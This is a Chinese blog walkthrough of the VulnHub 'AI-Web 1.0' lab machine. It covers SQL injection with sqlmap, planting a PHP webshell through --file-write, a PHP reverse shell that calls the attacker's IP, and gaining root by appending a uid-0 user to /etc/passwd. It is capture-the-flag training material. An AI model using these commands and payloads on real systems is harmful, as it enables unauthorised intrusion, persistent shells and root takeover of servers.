AI-web 1.0靶机练习

于 2024-10-11 22:57:29 发布
阅读量292 收藏 19
点赞数 20
分类专栏: vulnhub 文章标签: 前端 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_67832625/article/details/142865184
版权

项目地址

```plain https://www.vulnhub.com/entry/ai-web-1,353/ ``` ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/0f42b5259a86486199b03ccc6e44fe01.webp#pic_center)

实验过程

将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机

![](https://img-blog.csdnimg.cn/img_convert/1d48266c5490b65d22e22987e88ac2c2.png)

使用nmap进行主机发现,获取靶机IP地址

```plain nmap 192.168.47.1-254 ```

根据对比可知DC-8的一个ip地址为192.168.47.135

扫描Ai-Web1.0的操作系统,端口及对应服务

```plain nmap -A -p- 192.168.47.135 ```

发现开放80端口

在浏览器访问http://192.168.47.135

![](https://img-blog.csdnimg.cn/img_convert/26d0a0786f0ad3056f423a848cbabe04.png)

对网站进行目录和文件扫描

```plain dirb http://192.168.47.135 ```

出现robots.txt文件

进入网站进行查询

![](https://img-blog.csdnimg.cn/img_convert/a489a9d9e2ff76cf7f401a6aa07e6657.png)

尝试访问发现没有权限

使用dirb进行扫描

```plain dirb http://192.168.47.135/m3diNf0/ dirb http://192.168.47.135/se3reTdir777/ ```

结果可知dirb http://192.168.47.135/m3diNf0/有一个info.php页面

尝试访问

dirb http://192.168.47.135/se3reTdir777/有一个index.php页面

尝试访问

发现是查询页面 考虑sql注入

输入'页面报错

![](https://img-blog.csdnimg.cn/img_convert/cf635c2af7069ead2c0fb0b01f916654.png)

存在sql注入

使用Burpsuite进行一个抓包,得到注入点

![](https://img-blog.csdnimg.cn/img_convert/3316cfdeb529965837826bc220ca3019.png)

使用sqlmap进行扫描

```plain sqlmap -u "http://192.168.47.135/se3reTdir777/index.php" -data "uid=123&Operation=Submit" -dbs ``` 

sqlmap -u  "http://192.168.47.135/se3reTdir777/index.php" -data "uid=123&Operation=Submit" -D aiweb1 --tables


sqlmap -u  "http://192.168.47.135/se3reTdir777/index.php" -data "uid=123&Operation=Submit" -D aiweb1 -T user --columns


sqlmap -u  "http://192.168.47.135/se3reTdir777/index.php" -data "uid=123&Operation=Submit" -D aiweb1 -T user -C id --dump

没有什么有用信息了

尝试–os-shell

首先获取绝对路径

进入info.php查找

找到了路径 /home/www/html/web1x443290o2sdf92213/

需要一个可以上传文件的页面se3reTdir777/uploads/刚好符合

它的绝对目录为/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

使用--os-shell

```plain sqlmap -u "http://192.168.47.135/se3reTdir777/index.php" -data "uid=123&Operation=Submit" --level=3 --os-shell ```

成功进入shell

上传一句话木马

在sqlmap文件夹里写一个一句话木马文件

在sqlmap开个终端

sqlmap -u "http://192.168.47.135/se3reTdir777/index.php" --data "uid=123&Operation=Submit" --file-write 1.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/1.php

发现一句话木马文件移进来了

蚁剑连接

打开蚁剑
进行连接
```plain http://192.168.47.135/se3reTdir777/uploads/1.php ```

可以正常访问

这里蚁剑要拿到他的终端,右击打开终端
![](https://img-blog.csdnimg.cn/img_convert/48badbc12e9f28ef72886bf1ee59dcd0.png)

nc反弹

在 kali 写⼀个 php ⽂件
```plain <?php $sock=fsockopen("192.168.47.129",6666); exec("/bin/bash -i <&3 >&3 2>&3"); ?> ```

在Kali开启一个端口服务
```plain python -m http.server 7777 ```

到 os-shell 命令行,用wget 命令下载
```plain wget http://192.168.47.129:7777/3.php ```

开启监听

```plain nc -lvvp 6666 ```

在--os-shell 执行木马文件
```plain php 3.php ```

监听成功

提权

查看当前用户
![](https://img-blog.csdnimg.cn/img_convert/2ea30e69c83840524641885d19aa5746.png)

在 Linux 系统中我们要向手动生成⼀个密码可以采用opensll passwd来生成⼀个密码作为用户账号的密码。

Linux系统中的密码存放在 /etc/shadow 文件中,并且是以加密的方式存放的,根据加密方式的不同,所产生的加密后的密码的位数也不同 。

:::info
openssl passwd的作用是用来计算密码hash的,目的是为了防止密码以明文的形式出现。

:::

使用openssl 创建⼀个用户
```plain openssl passwd -1 -salt h 123456 ```

:::info
openssl passwd 参数 用户名 密码

:::

-1:表示采用的是MD5加密算法。

-salt:指定salt值,不使用随机产生的salt。在使用加密算法进行加密时,即使密码⼀样,salt不⼀样,所计算出来的hash值也不⼀样,除非密码⼀样,salt值也⼀样,计算出来的hash值才⼀样。salt为8字节的字符串。

将用户写入/etc/passwd文件中
```plain echo 'h:$1$h$DcmWd6ffV7pl4.0.1QBQ40:0:0:root:/root:/bin/bash'>>/etc/passwd ```

使用cat查看是否写入
```plain cat /etc/passwd ```

成功写入

切换用户
⽤脚本提升为交互式shell,然后切换用户 
python -c 'import pty;pty.spawn("/bin/bash")'
su h

寻找flag
```plain cd / ls cd root ls cat flag.txt ```


好小子,离成功又近一步!!!

蚂蚱.top
关注
专栏目录
ai-web1.0
longwanlian的博客
11-17 193
我选的是这个,然后下载完成后解压,使用VMware选择打开虚拟机点击解压后的文件夹,可以找到对应的文件,然后选择复制此虚拟机,(选移动的话有个bug)这里顺带说明一下(robots.txt文件是为了遵循爬虫协议,在这里面定义的路径,表示不希望被爬虫爬取)有时候可能会出现bug,例如mysql无法访问之类的,这里建议关机重启,或者直接删掉,再弄一次。这里输入之前的网络根地址,还需要一个可以写入的文件,这里将之前的目录一个个尝试。尝试直接访问,发现都是403,这里再次使用dirb命令探测一下目录。
ai web 1.0 靶场练习
weixin_69602647的博客
07-29 253
ai web 1.0练习
vulnhub靶场渗透系列-- AI:web:1
lza20001103的博客
10-02 4071
AI:web:1 文章目录AI:web:1前言靶机地址工具、知识点和漏洞存疑、待解决一、信息收集二、SQL注入三、提权file-dest 写入 webshellFind SUID添加用户名密码到/etc/passwd后记 前言 前面给大家讲解了外网和内网渗透的相关知识和技术,以及各种工具的使用,在我们渗透中都会遇到,接下来我们需要进行靶场的练习和渗透了,这也是一个提升渗透能力的方法,这里给大家推荐几个比较好的额靶场,vulnhub和红日靶场(http://vulnstack.qiyuanxuetang.ne
靶机渗透练习90-Grotesque:1.0.1
hirak0的博客
05-02 2926
靶机描述 靶机地址:https://www.vulnhub.com/entry/grotesque-101,658/ Description get flags difficulty: medium about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. This works
靶机渗透练习41-Empire Lupin One
热门推荐
hirak0的博客
04-18 1万+
靶机描述 靶机地址:https://www.vulnhub.com/entry/empire-lupinone,750/ Description Difficulty: Medium This box was created to be medium, but it can be hard if you get lost. CTF like box. You have to enumerate as much as you can. For hints discord Server ( https://d
网络安全ctf比赛学习资源整理(非常详细)零基础入门到精通,收藏这一篇就够了
2401_84618514的博客
08-20 590
1、CTF在线工具箱:http://ctf.ssleye.com/ 包含CTF比赛中常用的编码、加解密、算法。2、CTF加解密工具箱:http://www.atoolbox.net/Category.php?Id=273、ctfhub在线工具:https://www.ctfhub.com/#/tools4、还有一些常用的网站字符串2进制互转:http://www.5ixuexiwang.com/str/from-binary.php。
windows靶机60-100
2201_75378806的博客
03-27 4843
RTF是一种文本文件格式,旨在存储文本文档的格式化信息,例如字体、颜色和样式,而无需包含实际的二进制图像或多媒体数据。
【网安入门】怎样花3个月零基础入门网络安全
qkh1234567的博客
06-17 917
写这篇教程的初衷是很多朋友都想了解如何入门/转行网络安全,实现自己的“黑客梦”。文章的宗旨是:1.指出一些自学的误区 2.提供客观可行的学习表 3.推荐我认为适合小白学习的资源.大佬绕道哈!
红队打靶练习:WINTERMUTE: 1
分享
12-20 618
红队打靶练习:WINTERMUTE: 1 . 犹如蜻蜓低飞般的逼近感......
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6693
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件提权 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
Vulnhub靶机AI-Web-1.0
羊柳树的博客
01-20 4270
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
AI-Web-1.0靶场
qq_46187131的博客
03-27 1401
1.确认靶机IP 2.端口和目录扫描 3.使用SQLmap进行注入获取shell 4.使用openssl提权。
vulnhub靶机AI-Web-1.0渗透笔记
liver100day的博客
06-10 2377
AI-Web1靶机渗透笔记 靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机AI-Web1 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/ai-web-1,353/ 渗透过程 1.信息收集 1.1 主机发现 netdiscover 使用这条命令来确认目标靶机IP地址 确认目标靶机IP地址:192.168.75.134 1.2 端口扫描 使用端口扫描神器nmap进行扫描 nmap -T4 -sV -O -A -P- 192.1
记录一次vulnhub:AI-WEB-1.0靶场复现
sszsNo1的博客
06-24 259
又得到俩个路径,再次扫描路径后有没有其他的目录,首先扫描/m3diNf0/目录。发现访问/se3reTdir777/uploads/时出现跟上面一样,于是我就尝试访问/se3reTdir777/输入4时,却发现没有次用户,根据上面的回显说明数据库有三个用户,接下来判断闭合。先访问/index.html目录,发现跟没扫之前一样。访问/m3diNf0/目录时,说没有权限,换下一个。接着访问另一个,发现跟上面一样,信息搜集就到这了。再访问另外一个,又出现俩个目录,接着访问。访问一下,结果发现什么都没有。
Javascript数组研究03_手写实现_fill_filter_find_findIndex_findLast_findLastIndex
qq_33546823的博客
10-03 1342
fill()方法用一个固定值填充一个数组中从起始索引(默认为 0)到终止索引(默认为)内的全部元素。它返回修改后的数组。输入参数value:用来填充数组元素的值。start(可选):开始填充的位置,默认值为 0,索引处理方法和copyWithin一致。end(可选):停止填充的位置(不包含该位置),默认值为,索引处理方法和copyWithin方法一致。输出:修改后的原数组。注意事项该方法会改变原数组,是修改方法。对于稀疏数组,空槽也会被value填充。是通用的方法在空数组上不会有任何处理。
前端的全栈混合之路Meteor篇(四):支持自定义对象序列化的EJSON介绍
分享有趣的、贴近生活的CS知识
10-07 862
在Meteor框架中,EJSON(Extended JSON)是一个扩展了标准JSON的库,旨在支持更多的数据类型。标准JSON仅支持字符串、数字、布尔值、数组和对象等基本数据类型,而EJSON允许开发者在Meteor应用中传输更复杂的数据类型,例如DateBinary数据,甚至是自定义对象,这使得Meteor在客户端和服务器之间传递复杂数据变得更加便捷和高效。
Vue根实例、实例总结
m0_54007573的博客
10-04 690
Vue根实例、实例总结
前后分离项目记录
最新发布
qq_25806839的博客
10-10 186
打包报错 Thread Loader时,增加以下代码: 上线,打包prod时:
sqlmap进行os-shell需要靶机开启3306端口和MYSQL远程登陆吗
07-13
对于SQLMap进行OS shell(操作系统级别的命令执行)攻击,通常情况下需要满足以下两个条件: 1. 目标靶机上的MySQL服务需要启用远程登录功能,允许从远程主机连接。这通常涉及修改MySQL配置文件(如`my.cnf`或`my.ini`),确保`bind-address`参数设置为允许远程连接(通常为`0.0.0.0`)或者注释掉该参数。 2. 目标靶机上的MySQL服务需要监听在一个网络可访问的端口上,通常是默认的3306端口。 如果目标靶机满足上述条件,SQLMap就可以通过与目标数据库建立连接并执行操作系统命令,从而实现OS shell攻击。 然而,值得注意的是,远程登录MySQL并执行操作系统命令是一种非常危险的行为,可能导致系统的安全风险。在真实环境中,为了保护系统安全,通常不会将MySQL服务直接暴露在公共网络上,或者限制只允许特定IP地址进行远程登录。 因此,在进行SQL注入测试时,请确保已经获得合法的授权,并且目标靶机是在受控环境中进行测试。同时,遵守法律法规和道德规范,仅在合法授权范围内进行测试和攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值